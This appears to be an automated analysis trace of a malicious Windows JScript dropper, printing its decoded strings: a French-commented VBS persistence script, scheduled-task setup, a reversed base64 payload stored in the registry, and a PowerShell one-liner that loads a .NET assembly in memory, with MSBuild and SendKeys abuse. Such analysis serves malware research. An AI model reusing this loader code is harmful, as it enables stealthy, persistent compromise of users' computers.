F47C46->F51C50 F53C52 DeleteFile F47C46->F53C52 F55C54 CreateTextFile F47C46->F55C54 F57C56 Write F47C46->F57C56 F59C58 Close F47C46->F59C58 F49C48 ActiveXObject("Scripting.FileSystemObject") F63C62 join F61C60->F63C62 F65C64 split F61C60->F65C64 F69C68 GetObject F67C66->F69C68 F71C70 CreateKey F67C66->F71C70 F73C72 SetStringValue F67C66->F73C72 F79C78 open F75C74->F79C78 F81C80 send F75C74->F81C80 F77C76 ActiveXObject("MSXML2.XMLHTTP") F85C84 join F83C82->F85C84 F87C86 reverse F83C82->F87C86 F89C88 split F83C82->F89C88

                          Script:

                          Code
                          0
                          var CONST_GCU = 0x80000001;
                            1
                            var CONST_REG_SZ = 1;
                              2
                              var shellInstance, fileSystemInstance, registryShell;
                                3
                                var directoryName, mainFile, tempString, regValue1, tempString2, regValue2, tempString4, regValue4, processName, inputFile, fileContent, placeholder, constString1, constString2;
                                  4
                                  shellInstance = new ActiveXObject ( "WScript.Shell" );
                                    5
                                    fileSystemInstance = new ActiveXObject ( "Scripting.FileSystemObject" );
                                      6
                                      registryShell = new ActiveXObject ( "WScript.Shell" );
                                        7
                                        initializeVariablesAndProcess ( );
                                        • initializeVariablesAndProcess() ➔ undefined
                                        8
                                        createTaskScheduler ( directoryName, mainFile );
                                        • createTaskScheduler("YLhjFraZZwiadZg","C:\Users\totti\YLhjFraZZwiadZg.vbs") ➔ undefined
                                        9
                                        createTextFile ( mainFile, replaceString ( hexToAscii ( fileContent ), "|path|", directoryName ) );
                                        • hexToAscii("4F7074696F6E204578706C696369740A2750726F6A656374204E616D653A207C706174687C0A272044E9636C61726174696F6E20646573207661726961626C65730A44696D206F626A5368656C6C2C2077696E646F77734469722C20690A536574206F626A5368656C6C203D204372656174654F626A6563742822575363726970742E5368656C6C22290A77696E646F7773446972203D206F626A5368656C6C2E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A2720466F6E6374696F6E20706F75722076E972696669657220736920756E2070726F636573737573207370E9636966697175652065737420656E20636F7572732064276578E9637574696F6E0A46756E6374696F6E20497350726F6365737352756E6E696E672870726F636573734E616D65290A2020202044696D206F626A574D49536572766963652C20636F6C50726F6365737365730A20202020536574206F626A574D4953657276696365203D204765744F626A656374282277696E6D676D74733A5C5C2E5C726F6F745C63696D763222290A2020202053657420636F6C50726F636573736573203D206F626A574D49536572766963652E457865635175657279282253454C454354202A2046524F4D2057696E33325F50726F63657373205748455245204E616D653D272220262070726F636573734E616D65202620222722290A202020200A20202020497350726F6365737352756E6E696E67203D2028636F6C50726F6365737365732E436F756E74203E2030290A456E642046756E6374696F6E0A0A2720537562726F7574696E6520706F7572206578E9637574657220756E652073E97175656E636520646520636F6D6D616E6465732064616E7320506F7765725368656C6C0A5375622052756E506F7765725368656C6C436F6D6D616E647328290A2020202044696D20636F6C50726F6365737365732C206F626A50726F636573730A202020200A2020202027204C616E63657220506F7765725368656C6C20656E206D6F64652066656EEA7472E9206E6F726D616C0A202020206F626A5368656C6C2E52756E2077696E646F7773446972202620225C73797374656D33325C57696E646F7773506F7765725368656C6C5C76312E305C706F7765727368656C6C2E657865222C20320A202020200A202020202720417474656E6472652071756520506F7765725368656C6C20736F6974206C616E63E920657420656E766F7965722064657320636F6D6D616E6465730A2020202053657420636F6C50726F636573736573203D204765744F626A656374282277696E6D676D74733A22292E496E7374616E6365734F66282257696E33325F50726F6365737322290A20202020466F722045616368206F626A50726F6365737320496E20636F6C50726F6365737365730A2020202020202020496620537472436F6D70286F626A50726F636573732E4E616D652C2022706F7765727368656C6C2E657865222C20766254657874436F6D7061726529203D2030205468656E0A20202020202020202020202057697468206F626A5368656C6C0A202020202020202020202020202020202E4170704163746976617465206F626A50726F636573732E50726F6365737349640A202020202020202020202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C7622290A202020202020202020202020202020202E53656E644B65797320227B454E5445527D220A202020202020202020202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C636E22290A202020202020202020202020202020202E53656E644B65797320227B454E5445527D220A202020202020202020202020202020200A20202020202020202020202020202020575363726970742E536C65657020353030300A202020202020202020202020456E6420576974680A2020202020202020202020204578697420466F720A2020202020202020456E642049660A202020204E6578740A456E64205375620A0A2720426F75636C65207072696E636970616C650A466F722069203D203020546F20313030303020272052E964756974206C65206E6F6D6272652064276974E9726174696F6E7320706F7572206C6573206265736F696E732064652064E96D6F6E7374726174696F6E2E0A202020204966204E6F7420497350726F6365737352756E6E696E67286F626A5368656C6C2E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C69222929205468656E0A202020202020202052756E506F7765725368656C6C436F6D6D616E647328290A20202020456E642049660A202020200A20202020575363726970742E536C656570283130303030290A4E657874") ➔ "Option Explicit 'Project Name: |path| ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\|path|\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next"
                                        • replaceString("Option Explicit 'Project Name: |path| ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\|path|\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next","|path|","YLhjFraZZwiadZg") ➔ "Option Explicit 'Project Name: YLhjFraZZwiadZg ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next"
                                        • createTextFile("C:\Users\totti\YLhjFraZZwiadZg.vbs","Option Explicit 'Project Name: YLhjFraZZwiadZg ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next") ➔ undefined
                                        10
                                        function hexToAscii(hexString) {
                                        • hexToAscii("3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414D3841414141774141414145414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141345465734A57626C4E3363683943504B306750765A6D624A523363314A486476774449676F51442B6B4864704A58646A56326376774449674143494B3067507A56325A6C785761326C6D635152575A304E585A3146585A7939435067414349674143494B3067507649535A7A7857596D4A53507A4E585A6A4E5751705648496949585A72396D64756C3063684A535073566D646C78474973566D646C786B62766C4764314E575A3456455A6C5233636C5658636C4A48506741434967414349674169434E346A497A596E4C744E5859363032626A3143646D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E6273314765674D585A6E564762705A58617942465A6C5233636C5658636C4A485067414349674143494B30675035525861795633596C4E485067414349676F51442B49694D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A35476274684849765A6D624A523363314A4864384143494B3067507649436377466D4C753957613046325970784763774655654E4A53506C315759754269497734434D75416A4C78495350753957617A4A585A32425365306C47647556475A4A6C48626931575A7A4E5859384143494B30675069416A4C78495350753957617A4A585A575233636C5A5761754657626749534D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A3547627468484935786D59745632637A4647504B3067434E347A50694D585A354A53506C3532627346475A754647647A4269493430695255566C4939636D62705232626A35575A6749434D75456A4939343262704E6E636C5A4849733147652F777A76372B4F41414141414141414141414141426F4F41414D4775414141417741674C414144417541414D41344341784141414134474176425161414D48417942515A41594641674151654177474169425162415547417A4277634145454142414143416744414141414D413443417741674C414144417541514D4141414175427762416B47417A4267634155474157424164414D47413142415A4138474179424155414541414941414E414141416E42675A415147416E42675A415147416E42675A415147414141414141554741744251594134454130427759415548416B4277624149484151425141416F414130414141414141416C424165415547417541414E414944417741674D415944417741414F414944414141515A413047416842676241554741734251614159454173425159413447417042775A416B474179427754414541414E4167514141414141414141414141417A4277614149484168425162415547416B4251594149484155424162414547416E42515A4177454142415141416F43414141414E414944417741674D414143416741517141414341304241614163474170426763416B484177427762414D454141414164416747416E42516141494841354241634138474144424162414547416E42515A41774541424167454167454141414141415547413442515A413443413041674D414144417941674E414144413441674D414141416C425162414547414F42416241454741754267634155474130426762416B454142415144416F44414141414D413443417741674C414144417541514D41414141") ➔ "=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"
                                        • hexToAscii("4D534275696C642E657865") ➔ "MSBuild.exe"
                                        • hexToAscii("7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D612E617B5D7D3A3A617B287D277C706174687C277B297D") ➔ "{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\|path|' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'|path|'{)}"
                                        • hexToAscii("53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365") ➔ "Stop-Process -Name conhost -Force"
                                        • hexToAscii("484B45595F43555252454E545F555345525C536F6674776172655C") ➔ "HKEY_CURRENT_USER\Software\"
                                        • hexToAscii("5363686564756C652E53657276696365") ➔ "Schedule.Service"
                                        • hexToAscii("5054314D") ➔ "PT1M"
                                        • hexToAscii("4F7074696F6E204578706C696369740A2750726F6A656374204E616D653A207C706174687C0A272044E9636C61726174696F6E20646573207661726961626C65730A44696D206F626A5368656C6C2C2077696E646F77734469722C20690A536574206F626A5368656C6C203D204372656174654F626A6563742822575363726970742E5368656C6C22290A77696E646F7773446972203D206F626A5368656C6C2E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A2720466F6E6374696F6E20706F75722076E972696669657220736920756E2070726F636573737573207370E9636966697175652065737420656E20636F7572732064276578E9637574696F6E0A46756E6374696F6E20497350726F6365737352756E6E696E672870726F636573734E616D65290A2020202044696D206F626A574D49536572766963652C20636F6C50726F6365737365730A20202020536574206F626A574D4953657276696365203D204765744F626A656374282277696E6D676D74733A5C5C2E5C726F6F745C63696D763222290A2020202053657420636F6C50726F636573736573203D206F626A574D49536572766963652E457865635175657279282253454C454354202A2046524F4D2057696E33325F50726F63657373205748455245204E616D653D272220262070726F636573734E616D65202620222722290A202020200A20202020497350726F6365737352756E6E696E67203D2028636F6C50726F6365737365732E436F756E74203E2030290A456E642046756E6374696F6E0A0A2720537562726F7574696E6520706F7572206578E9637574657220756E652073E97175656E636520646520636F6D6D616E6465732064616E7320506F7765725368656C6C0A5375622052756E506F7765725368656C6C436F6D6D616E647328290A2020202044696D20636F6C50726F6365737365732C206F626A50726F636573730A202020200A2020202027204C616E63657220506F7765725368656C6C20656E206D6F64652066656EEA7472E9206E6F726D616C0A202020206F626A5368656C6C2E52756E2077696E646F7773446972202620225C73797374656D33325C57696E646F7773506F7765725368656C6C5C76312E305C706F7765727368656C6C2E657865222C20320A202020200A202020202720417474656E6472652071756520506F7765725368656C6C20736F6974206C616E63E920657420656E766F7965722064657320636F6D6D616E6465730A2020202053657420636F6C50726F636573736573203D204765744F626A656374282277696E6D676D74733A22292E496E7374616E6365734F66282257696E33325F50726F6365737322290A20202020466F722045616368206F626A50726F6365737320496E20636F6C50726F6365737365730A2020202020202020496620537472436F6D70286F626A50726F636573732E4E616D652C2022706F7765727368656C6C2E657865222C20766254657874436F6D7061726529203D2030205468656E0A20202020202020202020202057697468206F626A5368656C6C0A202020202020202020202020202020202E4170704163746976617465206F626A50726F636573732E50726F6365737349640A202020202020202020202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C7622290A202020202020202020202020202020202E53656E644B65797320227B454E5445527D220A202020202020202020202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C636E22290A202020202020202020202020202020202E53656E644B65797320227B454E5445527D220A202020202020202020202020202020200A20202020202020202020202020202020575363726970742E536C65657020353030300A202020202020202020202020456E6420576974680A2020202020202020202020204578697420466F720A2020202020202020456E642049660A202020204E6578740A456E64205375620A0A2720426F75636C65207072696E636970616C650A466F722069203D203020546F20313030303020272052E964756974206C65206E6F6D6272652064276974E9726174696F6E7320706F7572206C6573206265736F696E732064652064E96D6F6E7374726174696F6E2E0A202020204966204E6F7420497350726F6365737352756E6E696E67286F626A5368656C6C2E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C69222929205468656E0A202020202020202052756E506F7765725368656C6C436F6D6D616E647328290A20202020456E642049660A202020200A20202020575363726970742E536C656570283130303030290A4E657874") ➔ "Option Explicit 'Project Name: |path| ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\|path|\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next"
                                        11
                                        var asciiString = "";
                                          12
                                          for ( var i = 0 ; i < hexString.length ; i += 2 )
                                            13
                                            {
                                              14
                                              asciiString += String.fromCharCode ( parseInt ( hexString.substr ( i, 2 ), 16 ) );
                                              • "3D41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141